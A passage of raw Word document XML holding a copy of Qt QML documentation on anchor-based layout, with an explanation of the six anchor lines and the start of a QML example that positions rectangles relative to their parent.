    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B75670">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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1033" type="#_x0000_t75" alt="" style="width:1in;height:1in">
            <v:imagedata r:id="rId514" r:href="rId515"/>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00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="689" w:name="anchors"/>
      <w:bookmarkStart w:id="690" w:name="_Toc483000677"/>
      <w:bookmarkStart w:id="691" w:name="_Toc483003694"/>
      <w:bookmarkStart w:id="692" w:name="_Toc483604029"/>
      <w:bookmarkStart w:id="693" w:name="_Toc483605249"/>
      <w:bookmarkEnd w:id="689"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anchors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="690"/>
      <w:bookmarkEnd w:id="691"/>
      <w:bookmarkEnd w:id="692"/>
      <w:bookmarkEnd w:id="693"/>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the abilitiy to anchor</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to other</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId516" w:history="1">
        <w:r w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">types. There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>six anchor lines</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each item:</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>left</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>right</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vertical center</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bottom</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>horizontal center</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The three vertical anchor lines can be anchored to any of the three vertical anchor lines of another item, and the three horizontal anchor lines can be anchored to the horizontal anchor lines of another item</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For full details, see</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId517" w:history="1">
        <w:r w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Positioning with Anchors</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and the documentation of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId518" w:anchor="anchors.top-prop" w:history="1">
        <w:r w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>anchors property</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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QtQuick</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2.3</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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width</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200</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height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200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Rectangle</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Anchored to 20px off the top right corner of the parent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anchors</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right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parent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right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anchors</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top</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parent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top</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anchors</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margins</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20</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Sets all margins at once</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width</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80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height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80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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"orange"</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Rectangle</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Anchored to 20px off the top center corner of the parent.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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Notice the different group property syntax for 'anchors' compared to</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// the previous Rectangle. Both are valid.</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anchors </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horizontalCenter</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parent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horizontalCenter</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top</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parent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top</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topMargin</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20</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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
